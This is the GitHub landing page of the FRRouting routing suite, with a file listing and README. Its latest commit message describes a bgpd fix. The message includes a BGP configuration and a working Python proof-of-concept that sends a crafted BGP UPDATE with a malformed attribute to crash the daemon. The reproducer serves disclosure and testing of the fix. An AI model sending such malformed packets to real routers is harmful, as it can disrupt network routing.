Go to file
Donatas Abraitis 6814f2e013 bgpd: Treat EOR as withdrawn to avoid unwanted handling of malformed attrs
Treat-as-withdraw, otherwise if we just ignore it, we will pass it to be
processed as a normal UPDATE without mandatory attributes, that could lead
to harmful behavior. In this case, a crash for route-maps with the configuration
such as:

```
router bgp 65001
 no bgp ebgp-requires-policy
 neighbor 127.0.0.1 remote-as external
 neighbor 127.0.0.1 passive
 neighbor 127.0.0.1 ebgp-multihop
 neighbor 127.0.0.1 disable-connected-check
 neighbor 127.0.0.1 update-source 127.0.0.2
 neighbor 127.0.0.1 timers 3 90
 neighbor 127.0.0.1 timers connect 1
 !
 address-family ipv4 unicast
  neighbor 127.0.0.1 addpath-tx-all-paths
  neighbor 127.0.0.1 default-originate
  neighbor 127.0.0.1 route-map RM_IN in
 exit-address-family
exit
!
route-map RM_IN permit 10
 set as-path prepend 200
exit
```

Send a malformed optional transitive attribute:

```
import socket
import time

OPEN = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
b"\xff\xff\x00\x62\x01\x04\xfd\xea\x00\x5a\x0a\x00\x00\x01\x45\x02"
b"\x06\x01\x04\x00\x01\x00\x01\x02\x02\x02\x00\x02\x02\x46\x00\x02"
b"\x06\x41\x04\x00\x00\xfd\xea\x02\x02\x06\x00\x02\x06\x45\x04\x00"
b"\x01\x01\x03\x02\x0e\x49\x0c\x0a\x64\x6f\x6e\x61\x74\x61\x73\x2d"
b"\x70\x63\x00\x02\x04\x40\x02\x00\x78\x02\x09\x47\x07\x00\x01\x01"
b"\x80\x00\x00\x00")

KEEPALIVE = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
b"\xff\xff\xff\xff\xff\xff\x00\x13\x04")

UPDATE = bytearray.fromhex("ffffffffffffffffffffffffffffffff002b0200000003c0ff00010100eb00ac100b0b001ad908ac100b0b")

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.2', 179))
s.send(OPEN)
data = s.recv(1024)
s.send(KEEPALIVE)
data = s.recv(1024)
s.send(UPDATE)
data = s.recv(1024)
time.sleep(100)
s.close()
```

Reported-by: Iggy Frankovic <iggyfran@amazon.com>
Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org>
2023-10-31 17:21:54 +02:00
.github github: Add rebase label on PR if it's > 50 commits behind 2023-05-09 09:37:23 +03:00
alpine docker: Use openssl instead of libressl 2023-07-31 11:04:30 +03:00
babeld Merge pull request #13333 from donaldsharp/vrf_bitmap_cleanup 2023-07-04 22:11:11 +03:00
bfdd *: remove ZEBRA_INTERFACE_VRF_UPDATE 2023-10-07 10:06:39 +08:00
bgpd bgpd: Treat EOR as withdrawn to avoid unwanted handling of malformed attrs 2023-10-31 17:21:54 +02:00
debian debian: Increase version for development version to be 9.2 2023-10-11 07:57:06 +03:00
doc Merge pull request #14661 from opensourcerouting/feature/enable_enforce_first_as_by_default 2023-10-31 10:40:23 -04:00
docker docker: Install the apk packages regardless of the platform 2023-07-31 11:05:15 +03:00
eigrpd eigrp: use correct memory pool on interface deletion 2023-10-10 20:01:17 +03:00
fpm *: auto-convert to SPDX License IDs 2023-02-09 14:09:11 +01:00
gdb *: Rename thread.[ch] to event.[ch] 2023-03-24 08:32:16 -04:00
grpc *: manual SPDX License ID conversions 2023-02-09 14:09:07 +01:00
include bgpd,lib,sharpd,zebra: srv6 introduce multiple segs/SIDs in nexthop 2023-09-20 15:07:15 +02:00
isisd isisd: staticd: need to link directly against libyang 2023-10-26 22:53:44 -04:00
ldpd ldpd: Clarify error situation for different problems 2023-10-13 13:48:43 -04:00
lib lib: mgmt_msg: fix a valgrind memleak 2023-10-30 04:03:12 -04:00
m4 build: fix sed regex in Lua macro 2022-12-08 12:39:17 +01:00
mgmtd mgmtd, lib: remove batch ids from cfg apply reply 2023-10-17 15:06:13 +03:00
mlag build: fix AM_LDFLAGS usage (and gcov) 2021-07-21 17:10:08 +02:00
nhrpd Merge pull request #14561 from idryzhov/implicit-fallthrough 2023-10-13 11:51:11 -04:00
ospf6d ospfd, ospf6d: Fix spacing nit for show ... summary-address command 2023-10-30 08:40:19 +02:00
ospfclient *: Convert event.h to frrevent.h 2023-03-24 08:32:17 -04:00
ospfd Merge pull request #14688 from opensourcerouting/fix/ospf_spacing_nit 2023-10-30 08:49:03 -04:00
pathd pathd: replace ctime with ctime_r 2023-09-19 16:25:01 -04:00
pbrd pbrd: fix show pbr map detail json 2023-10-27 08:07:38 -07:00
pceplib *: auto-convert to SPDX License IDs 2023-02-09 14:09:11 +01:00
pimd Merge pull request #13576 from chiragshah6/mdev1 2023-10-30 08:55:49 +02:00
pkgsrc mgmtd: Bringup MGMTD daemon and datastore module support 2023-03-21 22:08:32 -04:00
python [ospfd]: add support for RFC 5709 HMAC-SHA Auth 2023-09-16 07:38:23 +03:30
qpb mgmtd: Bringup MGMTD daemon and datastore module support 2023-03-21 22:08:32 -04:00
redhat redhat: Update frr.spec file with older releases and increase current version 2023-10-11 07:56:15 +03:00
ripd *: remove ZEBRA_INTERFACE_VRF_UPDATE 2023-10-07 10:06:39 +08:00
ripngd *: remove ZEBRA_INTERFACE_VRF_UPDATE 2023-10-07 10:06:39 +08:00
sharpd *: Do not cast to the same type as the destination is 2023-09-29 10:24:16 +03:00
snapcraft snapcraft: Use libyang 2.1.80 2023-07-20 21:46:38 +03:00
staticd isisd: staticd: need to link directly against libyang 2023-10-26 22:53:44 -04:00
tests Merge pull request #14661 from opensourcerouting/feature/enable_enforce_first_as_by_default 2023-10-31 10:40:23 -04:00
tools build: add -Wimplicit-fallthrough 2023-10-12 21:23:18 +03:00
vrrpd Merge pull request #13731 from cyberstorm-mauritius/cid1519841 2023-06-21 23:15:41 +05:30
vtysh Merge pull request #14563 from opensourcerouting/fix/cpuwarning_starvation 2023-10-11 07:21:43 -04:00
watchfrr watchfrr: Extend ignore option to daemon being killed 2023-10-18 14:30:03 -04:00
yang bgpd: Enable enforce-first-as by default 2023-10-27 14:27:02 +03:00
zebra Merge pull request #14343 from pguibert6WIND/bgp_label_manual_allocate_label_mgr 2023-10-31 10:31:11 -04:00
.clang-format lib: add dynamic array type 2023-06-27 18:00:56 -04:00
.dockerignore docker: Make docker image on CentOS 7 2019-11-26 19:29:30 +00:00
.flake8 style: add format checker config that matches FRR style standards 2023-04-18 05:18:26 -04:00
.git-blame-ignore-revs tools: Ignore mass renaming of topotests for git blame 2021-05-11 14:14:26 +03:00
.gitignore doc: configure: add configure option to generate .ccls file 2023-05-18 09:32:32 -04:00
.isort.cfg style: add format checker config that matches FRR style standards 2023-04-18 05:18:26 -04:00
.pylintrc style: add format checker config that matches FRR style standards 2023-04-18 05:18:26 -04:00
.travis.yml lib: libyang2 add missed conversion 2021-05-17 22:13:59 -04:00
bootstrap.sh build: turn on automake warnings (& symlinks) 2021-04-21 15:42:37 +02:00
buildtest.sh *: manual SPDX License ID conversions 2023-02-09 14:09:07 +01:00
config.version.in build: carry --with-pkg-extra-version into tarballs 2018-10-24 15:11:50 +02:00
configure.ac build: add -Wimplicit-fallthrough 2023-10-12 21:23:18 +03:00
COPYING *: sort out & explain licenses used in FRR 2023-02-09 12:46:13 +01:00
Makefile.am build: clean up mgmtd lib protobuf make syntax 2023-03-27 16:44:27 -04:00
README.md doc: Fix the link that points to Slack invitation in README 2022-03-24 13:13:37 +02:00
stamp-h.in Initial revision 2002-12-13 20:15:29 +00:00
version.h build: make builddir include path consistent 2021-04-21 15:42:33 +02:00

Icon

FRRouting

FRR is free software that implements and manages various IPv4 and IPv6 routing protocols. It runs on nearly all distributions of Linux and BSD and supports all modern CPU architectures.

FRR currently supports the following protocols:

  • BGP
  • OSPFv2
  • OSPFv3
  • RIPv1
  • RIPv2
  • RIPng
  • IS-IS
  • PIM-SM/MSDP
  • LDP
  • BFD
  • Babel
  • PBR
  • OpenFabric
  • VRRP
  • EIGRP (alpha)
  • NHRP (alpha)

Installation & Use

For source tarballs, see the releases page.

For Debian and its derivatives, use the APT repository at https://deb.frrouting.org/.

Instructions on building and installing from source for supported platforms may be found in the developer docs.

Once installed, please refer to the user guide for instructions on use.

Community

The FRRouting email list server is located here and offers the following public lists:

Topic List
Development dev@lists.frrouting.org
Users & Operators frog@lists.frrouting.org
Announcements announce@lists.frrouting.org

For chat, we currently use Slack. You can join by clicking the "Slack" link under the Participate section of our website.

Contributing

FRR maintains developer's documentation which contains the project workflow and expectations for contributors. Some technical documentation on project internals is also available.

We welcome and appreciate all contributions, no matter how small!

Security

To report security issues, please use our security mailing list:

security [at] lists.frrouting.org